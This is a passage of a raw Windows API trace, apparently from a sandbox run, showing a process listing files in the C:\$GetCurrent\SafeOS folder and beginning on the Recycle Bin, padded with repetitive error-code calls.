0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.003] GetLastError () returned 0x0 [0045.003] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.004] SetLastError (dwErrCode=0x0) [0045.004] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.005] SetLastError (dwErrCode=0x0) [0045.005] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.006] SetLastError (dwErrCode=0x0) [0045.006] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.007] SetLastError (dwErrCode=0x0) [0045.007] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.008] GetLastError () returned 0x0 [0045.008] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.009] SetLastError (dwErrCode=0x0) [0045.009] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.010] SetLastError (dwErrCode=0x0) [0045.010] GetLastError () returned 0x0 [0045.011] SetLastError (dwErrCode=0x0) [0045.011] GetLastError () returned 0x0 [0045.011] SetLastError (dwErrCode=0x0) [0045.011] GetLastError () returned 0x0 [0045.011] SetLastError (dwErrCode=0x0) [0045.011] GetLastError () returned 0x0 [0045.011] SetLastError (dwErrCode=0x0) [0045.011] GetLastError () returned 0x0 [0045.011] SetLastError (dwErrCode=0x0) [0045.011] GetLastError () returned 0x0 [0045.011] SetLastError (dwErrCode=0x0) [0045.011] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0045.011] FindClose (in: hFindFile=0xf58e68 | out: hFindFile=0xf58e68) returned 1 [0045.012] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3320280 | out: hHeap=0x2a60000) returned 1 [0045.012] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0045.012] GetLastError () returned 0x12 [0045.012] SetLastError (dwErrCode=0x12) [0045.012] GetLastError () returned 0x12 [0045.012] SetLastError (dwErrCode=0x12) [0045.012] GetLastError () returned 0x12 [0045.012] SetLastError (dwErrCode=0x12) [0045.012] GetLastError () returned 0x12 [0045.012] SetLastError (dwErrCode=0x12) [0045.012] GetLastError () returned 0x12 [0045.012] SetLastError (dwErrCode=0x12) [0045.013] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3320280 [0045.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf59168 [0045.015] FindNextFileW (in: hFindFile=0xf59168, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.015] FindNextFileW (in: hFindFile=0xf59168, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0045.015] GetLastError () returned 0x12 [0045.015] SetLastError (dwErrCode=0x12) [0045.015] GetLastError () returned 0x12 [0045.015] SetLastError (dwErrCode=0x12) [0045.015] GetLastError () returned 0x12 [0045.015] SetLastError (dwErrCode=0x12) [0045.015] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.016] SetLastError (dwErrCode=0x12) [0045.016] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.017] SetLastError (dwErrCode=0x12) [0045.017] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.018] SetLastError (dwErrCode=0x12) [0045.018] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] FindNextFileW (in: hFindFile=0xf59168, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0045.019] GetLastError () returned 0x12 [0045.019] SetLastError (dwErrCode=0x12) [0045.019] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.020] GetLastError () returned 0x12 [0045.020] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.021] SetLastError (dwErrCode=0x12) [0045.021] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] GetLastError () returned 0x12 [0045.022] SetLastError (dwErrCode=0x12) [0045.022] FindNextFileW (in: hFindFile=0xf59168, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0045.022] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.023] SetLastError (dwErrCode=0x12) [0045.023] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.024] SetLastError (dwErrCode=0x12) [0045.024] GetLastError () returned 0x12 [0045.025] SetLastError (dwErrCode=0x12) [0045.025] GetLastError () returned 0x12 [0045.025] SetLastError (dwErrCode=0x12) [0045.025] FindNextFileW (in: hFindFile=0xf59168, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0045.025] FindNextFileW (in: hFindFile=0xf59168, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0045.025] FindNextFileW (in: hFindFile=0xf59168, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0045.025] FindClose (in: hFindFile=0xf59168 | out: hFindFile=0xf59168) returned 1 [0045.026] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3320280 | out: hHeap=0x2a60000) returned 1 [0045.026] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0045.026] FindClose (in: hFindFile=0xf590a8 | out: hFindFile=0xf590a8) returned 1 [0045.026] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3310278 | out: hHeap=0x2a60000) returned 1 [0045.026] FindNextFileW (in: hFindFile=0xf58e28, lpFindFileData=0x32ef884 | out: lpFindFileData=0x32ef884*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a60000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0045.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xf58e68 [0045.026] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, 